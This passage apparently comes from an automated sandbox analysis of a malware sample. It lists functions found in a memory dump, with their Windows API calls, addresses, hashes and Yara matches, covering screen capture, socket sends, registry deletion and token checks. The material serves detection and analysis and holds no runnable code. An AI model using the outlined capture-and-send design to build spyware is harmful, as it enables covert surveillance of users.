                                                                                    • API ID: ErrorLast$CriticalSection$CreateEnterEventExceptionIoctlLeaveRaisesocket
                                                                                    • String ID:
                                                                                    • API String ID: 688454317-0
                                                                                    • Opcode ID: 3cef7d9e3ea38d5f02927d32446fcc6fbe48b6e62d1415d8eed321e55ecb2cdb
                                                                                    • Instruction ID: 5efafa711b5056b9baacf8e3e5625017e52fc6b2ebe2c8a80d2339c0b494304e
                                                                                    • Opcode Fuzzy Hash: 3cef7d9e3ea38d5f02927d32446fcc6fbe48b6e62d1415d8eed321e55ecb2cdb
                                                                                    • Instruction Fuzzy Hash: C041E475A002449BEB24DF69DA40FBE77B5EF84315F10116EED06E7280EB70B942DB51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EE0F1F, Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _free
                                                                                    • String ID:
                                                                                    • API String ID: 269201875-0
                                                                                    • Opcode ID: 3b4435d064f55bde033720603e8c5f8f7034bca40576b3bee57121b6c0ee9df7
                                                                                    • Instruction ID: 044d93483f48b90ac0f1a00c07dd8878e180d42d97b98009bc331e92fcced9a5
                                                                                    • Opcode Fuzzy Hash: 3b4435d064f55bde033720603e8c5f8f7034bca40576b3bee57121b6c0ee9df7
                                                                                    • Instruction Fuzzy Hash: BA41D132A00614AFDB20DFB9C880A7DB7B5FF84318F1695A9D519EB380D671F941CB80
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC2720, Relevance: 7.6, APIs: 5, Instructions: 121windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 04EC5530: GetCurrentThreadId.KERNEL32 ref: 04EC5548
                                                                                      • Part of subcall function 04EC5530: GetThreadDesktop.USER32(00000000), ref: 04EC554F
                                                                                      • Part of subcall function 04EC5530: GetUserObjectInformationA.USER32 ref: 04EC558F
                                                                                      • Part of subcall function 04EC5530: OpenInputDesktop.USER32(00000000,00000000,02000000), ref: 04EC559A
                                                                                      • Part of subcall function 04EC5530: GetUserObjectInformationA.USER32 ref: 04EC55CE
                                                                                      • Part of subcall function 04EC5530: lstrcmpiA.KERNEL32(?,?), ref: 04EC55DE
                                                                                      • Part of subcall function 04EC5530: SetThreadDesktop.USER32(00000000), ref: 04EC55E9
                                                                                      • Part of subcall function 04EC5530: CloseDesktop.USER32(?), ref: 04EC55FD
                                                                                      • Part of subcall function 04EC5530: CloseDesktop.USER32(00000000), ref: 04EC5600
                                                                                    • ReleaseDC.USER32 ref: 04EC2751
                                                                                    • GetDesktopWindow.USER32 ref: 04EC2757
                                                                                    • GetDC.USER32(00000000), ref: 04EC2764
                                                                                      • Part of subcall function 04EC2AD0: BitBlt.GDI32(00000000,00000000,00000000,?,00000001,?,00000000,00000000,?), ref: 04EC2AF7
                                                                                      • Part of subcall function 04EC2AD0: SetRect.USER32 ref: 04EC2B20
                                                                                    • GetCursorPos.USER32(?), ref: 04EC2783
                                                                                    • BitBlt.GDI32(?,00000000,00000000,00000002,?,?,00000000,00000000,?), ref: 04EC27D2
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Desktop$Thread$CloseInformationObjectUser$CurrentCursorInputOpenRectReleaseWindowlstrcmpi
                                                                                    • String ID:
                                                                                    • API String ID: 1863377006-0
                                                                                    • Opcode ID: 244c49fd097c8c30ba37ae102ac8b9e92fd37be41a49d5211b41485c2151e8a7
                                                                                    • Instruction ID: b9d3c1949a7d128e8e601b0058db2792c687a578fb4905d59c3b90af374de996
                                                                                    • Opcode Fuzzy Hash: 244c49fd097c8c30ba37ae102ac8b9e92fd37be41a49d5211b41485c2151e8a7
                                                                                    • Instruction Fuzzy Hash: 99415C72A00A06BFCB11CF69DA84B94F7B1FF58314F044299EA0497A51D731F8A2CBE1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ECD670, Relevance: 7.6, APIs: 5, Instructions: 119networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 04ECCC60: StrChrW.SHLWAPI(?,0000003A), ref: 04ECCC84
                                                                                    • WSASetLastError.WS2_32(0000273F,?,?), ref: 04ECD6F6
                                                                                      • Part of subcall function 04ECCD10: WSASetLastError.WS2_32(00002741), ref: 04ECCD3A
                                                                                    • socket.WS2_32(00000000,00000002,00000011), ref: 04ECD719
                                                                                    • WSAIoctl.WS2_32(00000000,9800000C,00000000,00000004,00000000,00000000,00000000,00000000,00000000), ref: 04ECD746
                                                                                    • WSAGetLastError.WS2_32 ref: 04ECD751
                                                                                    • WSACreateEvent.WS2_32 ref: 04ECD771
                                                                                      • Part of subcall function 04EB7AB0: RaiseException.KERNEL32(C000001D,00000001,00000000,00000000,?,04EB83CB,80004005,?,04EB87E8,04EB8B5E,00000000,?), ref: 04EB7ACE
                                                                                      • Part of subcall function 04EB7AB0: EnterCriticalSection.KERNEL32(?,00000004,?,?,04EB83CB,80004005,?,04EB87E8,04EB8B5E,00000000,?), ref: 04ECF693
                                                                                      • Part of subcall function 04EB7AB0: LeaveCriticalSection.KERNEL32(?,?,?,04EB83CB,80004005,?,04EB87E8,04EB8B5E,00000000,?), ref: 04ECF6BB
                                                                                      • Part of subcall function 04EB7AB0: SetLastError.KERNEL32(0000139F,?,04EB83CB,80004005,?,04EB87E8,04EB8B5E,00000000,?), ref: 04ECF6C7
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$CriticalSection$CreateEnterEventExceptionIoctlLeaveRaisesocket
                                                                                    • String ID:
                                                                                    • API String ID: 688454317-0
                                                                                    • Opcode ID: 0fcdd70020a1a2df0d37f1b180cc19d2b20934ce9653e8800a4a9cd4e9978495
                                                                                    • Instruction ID: a26c5980e051388568f0c6da5c7769078b30af1ec68da78346b3f35e713eff7f
                                                                                    • Opcode Fuzzy Hash: 0fcdd70020a1a2df0d37f1b180cc19d2b20934ce9653e8800a4a9cd4e9978495
                                                                                    • Instruction Fuzzy Hash: 4B31C775A00204ABE724EF64DD84FAE77A4EF88314F20556EED0AD72C0EB71B942C755
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EB8230, Relevance: 7.6, APIs: 5, Instructions: 117COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,?,04EB87E8,04EB8B5E,00000000,?,?,04EB8B5E,04EFD024,?), ref: 04EB824B
                                                                                      • Part of subcall function 04EBABA0: HeapCreate.KERNEL32(00000004,00000000,00000000,74E5F5E0,00000004,04EB8319,?,04EB8B5E,04EFD024,?), ref: 04EBABC5
                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(00000150,00000000,?,04EB8B5E,04EFD024,?), ref: 04EB832C
                                                                                    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,04EB8B5E,04EFD024,?), ref: 04EB8366
                                                                                    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,04EB8B5E,04EFD024,?), ref: 04EB837B
                                                                                    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 04EB838F
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Create$Event$CountCriticalHeapInitializeSectionSpin
                                                                                    • String ID:
                                                                                    • API String ID: 1949328396-0
                                                                                    • Opcode ID: bd6426d10246ec5444bc02ccf50ff0bde76fc36f47190b635c125bc8a0e3f335
                                                                                    • Instruction ID: 6ed27a6fb872ef6ff78fe994e7fcc893d010a138dd4d79e7dfae1ec4f7793c52
                                                                                    • Opcode Fuzzy Hash: bd6426d10246ec5444bc02ccf50ff0bde76fc36f47190b635c125bc8a0e3f335
                                                                                    • Instruction Fuzzy Hash: B941BEB0140B01AAF3709F25CC59B97BAE8AF00758F10591DD69A6A6D0DBF6B148CF94
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EB7F50, Relevance: 7.6, APIs: 5, Instructions: 110COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,?,04EB8B17,04EFD048,?), ref: 04EB7F6B
                                                                                      • Part of subcall function 04EBABA0: HeapCreate.KERNEL32(00000004,00000000,00000000,74E5F5E0,00000004,04EB8319,?,04EB8B5E,04EFD024,?), ref: 04EBABC5
                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(0000014C,00000000,?,04EB8B17,04EFD048,?), ref: 04EB804C
                                                                                    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,04EB8B17,04EFD048,?), ref: 04EB8086
                                                                                    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,04EB8B17,04EFD048,?), ref: 04EB809B
                                                                                    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 04EB80AF
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Create$Event$CountCriticalHeapInitializeSectionSpin
                                                                                    • String ID:
                                                                                    • API String ID: 1949328396-0
                                                                                    • Opcode ID: 3850d071bb55db40b202ebc765f7a97a1ac683e21d307a882c82856952c58772
                                                                                    • Instruction ID: c183bf1bdc77481a544de9936141c3f85a0c3e439728eba0c94d23663b6c3465
                                                                                    • Opcode Fuzzy Hash: 3850d071bb55db40b202ebc765f7a97a1ac683e21d307a882c82856952c58772
                                                                                    • Instruction Fuzzy Hash: 9641DDB0140B01ABF3709F65CC59B83BAE8AF00748F10591DE69A6A6D0DBF6B148CF94
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC43E0, Relevance: 7.6, APIs: 5, Instructions: 110COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,?,?,?,?,?,?,00000001,74E069A0), ref: 04EC4461
                                                                                    • GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000,?,?,?,?,?,?,?,00000001,74E069A0), ref: 04EC4486
                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000001,74E069A0), ref: 04EC4490
                                                                                    • GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000001,74E069A0), ref: 04EC44CD
                                                                                    • LookupAccountSidW.ADVAPI32(00000000,00000000,?,00000100,?,00000100,?), ref: 04EC44FE
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Token$Information$AccountErrorLastLookupOpenProcess
                                                                                    • String ID:
                                                                                    • API String ID: 2790146286-0
                                                                                    • Opcode ID: 936be4ccb75b3c3c8f04db1d67ba091504c817912c07d1270256ca82c8e8b717
                                                                                    • Instruction ID: 1fad238e00ccf47d4002f6e6f79a199f1cda819a64e3407e7fdd1f32b02e8b9d
                                                                                    • Opcode Fuzzy Hash: 936be4ccb75b3c3c8f04db1d67ba091504c817912c07d1270256ca82c8e8b717
                                                                                    • Instruction Fuzzy Hash: 4C4165B590011CAAEB30DB50DD45FEA77BCEF44704F0051E9EB09B6180EB75AE868B69
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ECCDA0, Relevance: 7.6, APIs: 5, Instructions: 108networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 04ECCE3C
                                                                                    • WSASetLastError.WS2_32(00000000), ref: 04ECCE5E
                                                                                    • freeaddrinfo.WS2_32(?), ref: 04ECCEBB
                                                                                    • htons.WS2_32(?), ref: 04ECCEC9
                                                                                    • WSASetLastError.WS2_32(00002AF9), ref: 04ECCEEF
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$freeaddrinfogetaddrinfohtons
                                                                                    • String ID:
                                                                                    • API String ID: 1798125793-0
                                                                                    • Opcode ID: 93e72224e23bf877c8f8ab9020c98ab66788a9aae633a1a592c0eccd1902ca4a
                                                                                    • Instruction ID: a5557f10984f1a645c688c95b48086b51b8f397f3159c84d2a586f0e865c8cf3
                                                                                    • Opcode Fuzzy Hash: 93e72224e23bf877c8f8ab9020c98ab66788a9aae633a1a592c0eccd1902ca4a
                                                                                    • Instruction Fuzzy Hash: 3841BC76A083008FC720DF24E845BBBB7E5FF8A315F11566EE84D8B250EB31A845C792
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ED4680, Relevance: 7.6, APIs: 5, Instructions: 100networkmemoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00004E20), ref: 04ED470B
                                                                                    • WSASend.WS2_32(?,00004E20,00000001,?,00000000,?,00000000), ref: 04ED473E
                                                                                    • WSAGetLastError.WS2_32 ref: 04ED4749
                                                                                    • InterlockedDecrement.KERNEL32(00000002), ref: 04ED4759
                                                                                    • HeapFree.KERNEL32(?,00000000,?,?), ref: 04ED4789
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Interlocked$DecrementErrorExchangeFreeHeapLastSend
                                                                                    • String ID:
                                                                                    • API String ID: 930714758-0
                                                                                    • Opcode ID: c7d09c13f2fd72d9b5ffee5a9fee8398bbda3812fb1351d43f6b6c3b36495383
                                                                                    • Instruction ID: 2576b4b2646981919523177fe344242eb856c69b3847b9562fd38ed37f0176cb
                                                                                    • Opcode Fuzzy Hash: c7d09c13f2fd72d9b5ffee5a9fee8398bbda3812fb1351d43f6b6c3b36495383
                                                                                    • Instruction Fuzzy Hash: 23418D75500204DFDB20CF25D984BAAB7F8FF95314F045669ED4A8B285DB31B806CFA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ECF250, Relevance: 7.6, APIs: 6, Instructions: 97memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 04ECF284
                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 04ECF2DB
                                                                                    • HeapFree.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 04ECF31F
                                                                                    • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 04ECF331
                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 04ECF370
                                                                                    • HeapFree.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 04ECF398
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$EnterFreeHeapLeave
                                                                                    • String ID:
                                                                                    • API String ID: 3296397286-0
                                                                                    • Opcode ID: e3bc8e9066563da586db866b7be61f5b603c9fe6287cdb1ebedaa3ec728749c2
                                                                                    • Instruction ID: 0e46c63fdc0008729a88f645f98171c1442d7d4cb593368ad60b4f90b2457688
                                                                                    • Opcode Fuzzy Hash: e3bc8e9066563da586db866b7be61f5b603c9fe6287cdb1ebedaa3ec728749c2
                                                                                    • Instruction Fuzzy Hash: 91314D75500200AFDB108F19DA88BE6B7F9FF85315F14927DEC188B285EB35A846CBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC0FA0, Relevance: 7.6, APIs: 5, Instructions: 95registrymemoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 04EC100E
                                                                                    • RegOpenKeyExW.ADVAPI32(?,00000000,00000000,00000102,?), ref: 04EC1043
                                                                                    • RegDeleteValueW.ADVAPI32(?,00000000), ref: 04EC1051
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 04EC105F
                                                                                    • LocalFree.KERNEL32(?,?,?,0000003F), ref: 04EC1080
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Local$AllocCloseDeleteFreeOpenValue
                                                                                    • String ID:
                                                                                    • API String ID: 3540541088-0
                                                                                    • Opcode ID: a9554ba0b0e4a2bc7bac77eab70267639fdbe3632afa6d75de1bd8e0807419c3
                                                                                    • Instruction ID: 6f407b17b18abfe4cda5b6d1bf7945e518c6341f2a9cba10fed5fde9990bec46
                                                                                    • Opcode Fuzzy Hash: a9554ba0b0e4a2bc7bac77eab70267639fdbe3632afa6d75de1bd8e0807419c3
                                                                                    • Instruction Fuzzy Hash: E0318DB5D00219EBEB10DFA4D945AEEBBB8FF44354F14802AFD15A7240D735AA16CF90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EB4FB0, Relevance: 7.6, APIs: 5, Instructions: 95filememoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000007,?,?,?), ref: 04EB5011
                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?), ref: 04EB502E
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?), ref: 04EB5037
                                                                                    • LocalAlloc.KERNEL32(00000040,?,00000007,?,?,?), ref: 04EB504D
                                                                                    • LocalFree.KERNEL32(00000000,00000000,?,0000003F,?,?,?), ref: 04EB5095
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FileLocal$AllocCloseCreateFreeHandleSize
                                                                                    • String ID:
                                                                                    • API String ID: 1503672127-0
                                                                                    • Opcode ID: 7b54f7aa669dffff806cb772b7297836cd00de9bd01812b3350b13b0561458dd
                                                                                    • Instruction ID: 484a4ff3d0df9de5765a823db1272b1cdbd36e5e7f9e2696465e2bcbd4f3df9d
                                                                                    • Opcode Fuzzy Hash: 7b54f7aa669dffff806cb772b7297836cd00de9bd01812b3350b13b0561458dd
                                                                                    • Instruction Fuzzy Hash: 8E31AD31600204ABD720DFA8EC84FAABBB9FB85755F10492AF99597280D770B915CBE0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC2880, Relevance: 7.6, APIs: 5, Instructions: 94windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetDC.USER32(00000000), ref: 04EC2913
                                                                                    • CreateCompatibleBitmap.GDI32(00000000,00000001,00000001), ref: 04EC2920
                                                                                    • GetDIBits.GDI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 04EC2933
                                                                                    • ReleaseDC.USER32 ref: 04EC293C
                                                                                    • DeleteObject.GDI32(00000000), ref: 04EC2943
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: BitmapBitsCompatibleCreateDeleteObjectRelease
                                                                                    • String ID:
                                                                                    • API String ID: 3052192651-0
                                                                                    • Opcode ID: 4cdb6effe00aa98a0bf1cf9d0e16e66acf0fbfc9bbde1f1ffd195705e8ea082d
                                                                                    • Instruction ID: 7f76c609c30a53e2d632b516adae20ca658b02927e2ce77a11c29d602adbe84e
                                                                                    • Opcode Fuzzy Hash: 4cdb6effe00aa98a0bf1cf9d0e16e66acf0fbfc9bbde1f1ffd195705e8ea082d
                                                                                    • Instruction Fuzzy Hash: D931F772A00210AFEB049F19D989B6AFFA4EF55315F058299ED09CF2C5D378DA40CB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC29D0, Relevance: 7.6, APIs: 5, Instructions: 92windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateDIBSection.GDI32(00000000,?,00000000,00000000,00000000,00000000), ref: 04EC2A2D
                                                                                    • SelectObject.GDI32(?,00000000), ref: 04EC2A3C
                                                                                    • BitBlt.GDI32(?,?,?,8A0004C2,5DE58B5B,?,?,?,?), ref: 04EC2A62
                                                                                    • BitBlt.GDI32(?,00000000,00000000,?,5DE58B5B,?,00000000,?,00CC0020), ref: 04EC2A84
                                                                                    • DeleteObject.GDI32(00000000), ref: 04EC2AB6
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Object$CreateDeleteSectionSelect
                                                                                    • String ID:
                                                                                    • API String ID: 3188413882-0
                                                                                    • Opcode ID: 1ab294f9c41462f7fd2b6c153474f35a84168137449cc8b0c4c8c5e55a1bdc1d
                                                                                    • Instruction ID: 9fb5f4f2e01ed94e983b3b00f1e4c31f005cc514d9070995592261618983a235
                                                                                    • Opcode Fuzzy Hash: 1ab294f9c41462f7fd2b6c153474f35a84168137449cc8b0c4c8c5e55a1bdc1d
                                                                                    • Instruction Fuzzy Hash: F9311576900204EFDB00CF98C985E9ABFB9FF49310F158196FA049B262D371ED91DBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ECCF10, Relevance: 7.6, APIs: 5, Instructions: 89networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • htons.WS2_32(?), ref: 04ECCF22
                                                                                    • WSAAddressToStringW.WS2_32(?,00000010,00000000,?,?), ref: 04ECCF4A
                                                                                    • htons.WS2_32(?), ref: 04ECCF66
                                                                                    • StrPBrkW.SHLWAPI(?,04EFE788,?,00000010,00000000,?,?), ref: 04ECCF8C
                                                                                    • StrChrW.SHLWAPI(?,00000025,?,00000010,00000000,?,?), ref: 04ECCF97
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: htons$AddressString
                                                                                    • String ID:
                                                                                    • API String ID: 2368566317-0
                                                                                    • Opcode ID: 016014df7dca6e46e02b6eb4a0efc336e64af2b32f43f10ed886aa12d8d459e3
                                                                                    • Instruction ID: 271cbc4c1414a690425c9548f248f1a064841b0b14db44736fac9bb0386ebdfa
                                                                                    • Opcode Fuzzy Hash: 016014df7dca6e46e02b6eb4a0efc336e64af2b32f43f10ed886aa12d8d459e3
                                                                                    • Instruction Fuzzy Hash: 1321D335300241AFDB104F69DC84A7AB3ECEF99719F10406EFD0ACB250EBB5E8429761
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC7A50, Relevance: 7.6, APIs: 5, Instructions: 87synchronizationCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,04EB9782,?,Function_000568D8,00000000), ref: 04EC7A78
                                                                                      • Part of subcall function 04EB2330: CoInitialize.OLE32(00000000), ref: 04EB239B
                                                                                    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,04EB9782,?,Function_000568D8,00000000), ref: 04EC7AD0
                                                                                    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 04EC7B21
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04EC7B46
                                                                                    • CloseHandle.KERNEL32(?), ref: 04EC7B4F
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateEvent$CloseHandleInitializeObjectSingleWait
                                                                                    • String ID:
                                                                                    • API String ID: 3162378676-0
                                                                                    • Opcode ID: fee7224fbf41a62ee412ab67814d5f64e890eb5c16ca38c028a2efb27619e84d
                                                                                    • Instruction ID: 3cc44407be98e282d49c7f8d5aa8868dfb9398aba032486cf73449d99ca1a925
                                                                                    • Opcode Fuzzy Hash: fee7224fbf41a62ee412ab67814d5f64e890eb5c16ca38c028a2efb27619e84d
                                                                                    • Instruction Fuzzy Hash: 2D319CB1740306BBE710CF59CD45BAAFBA4FB44705F10422AEA19AB2C0D7B2B454CBD1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ECD0D0, Relevance: 7.6, APIs: 5, Instructions: 84COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • setsockopt.WS2_32(?,0000FFFF,000000FB,00000000,00000004), ref: 04ECD115
                                                                                    • setsockopt.WS2_32(?,0000FFFF,00000004,00000000,00000004), ref: 04ECD127
                                                                                    • setsockopt.WS2_32(?,0000FFFF,000000FB,00000000,00000004), ref: 04ECD155
                                                                                    • setsockopt.WS2_32(?,0000FFFF,00000004,00000001,00000004), ref: 04ECD167
                                                                                    • SetLastError.KERNEL32(00000057), ref: 04ECD17E
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: setsockopt$ErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 1564866530-0
                                                                                    • Opcode ID: c70539acb127cb80a48a310ffaacc256ea1296fc7095f001fd6e4e70aabeab6f
                                                                                    • Instruction ID: 28c1e380fc5ec24fc9fba5bf43c5fc662e22fc3a5ac6e931b4a8f89cddb04de6
                                                                                    • Opcode Fuzzy Hash: c70539acb127cb80a48a310ffaacc256ea1296fc7095f001fd6e4e70aabeab6f
                                                                                    • Instruction Fuzzy Hash: 87212B75B0420DBADB10DB65AC41FBE776CEF85335F2002BAEB05E71C0DA7169098750
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC11A0, Relevance: 7.6, APIs: 5, Instructions: 84registrymemoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 04EC1204
                                                                                    • RegOpenKeyExW.ADVAPI32(?,00000000,00000000,00020106,?), ref: 04EC1232
                                                                                    • SHDeleteKeyW.SHLWAPI(?,04EFB5D0), ref: 04EC1244
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 04EC1252
                                                                                    • LocalFree.KERNEL32(00000000,00000000,?,0000003F), ref: 04EC1270
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Local$AllocCloseDeleteFreeOpen
                                                                                    • String ID:
                                                                                    • API String ID: 3791902735-0
                                                                                    • Opcode ID: 056168b99024224378b05d2cac76078ace26191b1cc187c4791a9633dae0e98d
                                                                                    • Instruction ID: fc98e7623d76750951f9102d1a0d02e1e99317eb5fa5111c65f2fb2196a775b4
                                                                                    • Opcode Fuzzy Hash: 056168b99024224378b05d2cac76078ace26191b1cc187c4791a9633dae0e98d
                                                                                    • Instruction Fuzzy Hash: DE318FB5900218ABDB04DFA5DC44AEEBBB8FF44354F10812AF906AB241E775AA45CF90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ECF3B0, Relevance: 7.6, APIs: 5, Instructions: 79networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • send.WS2_32(?,?,?,00000000), ref: 04ECF3DA
                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,04ECF2F6,?,00000000), ref: 04ECF3EE
                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,04ECF2F6,?,00000000), ref: 04ECF3FE
                                                                                    • SetLastError.KERNEL32(00000000,?,?,04ECF2F6,?,00000000), ref: 04ECF406
                                                                                    • WSAGetLastError.WS2_32(?,?,04ECF2F6,?,00000000), ref: 04ECF44B
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalErrorLastSection$EnterLeavesend
